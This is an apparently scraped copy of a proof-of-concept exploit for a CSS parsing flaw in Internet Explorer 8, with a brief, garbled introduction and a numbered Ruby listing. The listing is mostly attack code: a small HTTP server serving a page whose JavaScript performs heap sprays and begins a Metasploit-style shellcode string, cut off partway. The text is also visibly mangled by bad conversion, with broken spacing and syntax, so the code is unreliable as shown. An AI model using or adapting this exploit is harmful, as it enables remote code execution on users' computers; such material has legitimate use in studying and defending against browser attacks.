Internet Explorer 8 is a Web browser launched by Microsoft. The vulnerability in parsing css may cause remote code execution. This vulnerability was initially made by wooyun: logging. For more information about the vulnerability analysis and exploitation code, see http://www.breakingpointsystems.com/community/blog/ie-vulnerability/. in this document, the attacker can view: When A DoS Isnt A DoS.
[+] Info:
~~~~~~~~~
Internet Explorer 8 CSS Parser Exploit
[+] Poc:
~~~~~~~~~
View sourceprint? 001 #! /Usr/bin/env ruby
002
003 # Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/
004 # Author: Nephi Johnson (d0c_s4vage)
005
006 require socket
007
008 def http_send (sock, data, opts = {})
009 defaults = {: code => "200",: message => "OK",: type => "text/html "}
010 opts = defaults. merge (opts)
011
012 code = opts [: code]
013 message = opts [: message]
014 type = opts [: type]
015
016 to_send = "HTTP/1.1 # {code }#{ message}" +
017 "Date: Sat, 11 Dec 2010 14:20:23 GMT" +
018 "Cache-Control: no-cache" +
019 "Content-Type: # {type}" +
020 "Pragma: no-cache" +
021 "Content-Length: # {data. length}" +
022 "# {data }"
023 puts "[+] Sending :"
024 to_send.split (""). each do | line |
025 puts "# {line }"
026 end
027 sock. write (to_send) rescue return false
028 return true
029 end
030
031 def sock_read (sock, out_str, timeout = 5)
032 begin
033 if Kernel. select ([sock], [], [], timeout)
034 out_str.replace (sock. recv (1024 ))
035 puts "[+] Received :"
036 out_str.split (""). each do | line |
037 puts "# {line }"
038 end
039 else
040 sock. close
041 return false
042 end
043 rescue Exception => ex
044 return false
045 end
046 end
047
048 def to_uni (str)
049 res = ""
050 str. each_byte do | B |
051 res <"x00 # {B. chr }"
052 end
053 res
054 end
055
056 @ css_name = "x00sx03sx00sx03sx00sx03sx00sx00sx03s"
057 @ html_name = "test.html"
058 placeholder = "a" * (@ css_name.length/2)
059
060 @ html = <-HTML
061 <script>
062 function dup_str (str, length ){
063 var res = str;
064 while (res. length <length ){
065 res + = res;
066}
067 res = res. substr (res. length-length );
068 return res;
069}
070
071 function to_bin (str ){
072 var res = "";
073 while (str. length> 0 ){
074 var first = str. substr (0, 2 );
075 var second = str. substr (2, 2 );
076 res + = "% u" + second + first;
077 str = (str. length> 4 )? Str. substr (4 ):"";
078}
079 return unescape (res );
080}
081
082 // first heap spray
083 var base = dup_str (to_bin ("0c0c0c090000000800000073007300000000000000730073030c"), 512 + 6 );
084 var arr = []
085 for (var I = 0; I <60000; I ++ ){
086 arr [I] = ["" + base]. join ("");
087}
088
089 // second heap spray w/shellcode
090 var nops = dup_str (to_bin ("0c0c0c0c"), 4096 + 6 );
091
092 // windows/exec-200 bytes
093 // asploit.com "> http://www.metasploit.com
094 // EXITFUNC = process, commandid calc.exe
095 var shellcode = unescape ("% ue8fc % u0089 % u0000 % u8960 % u31e5 % u64d2 % u528b % u8b30" +
096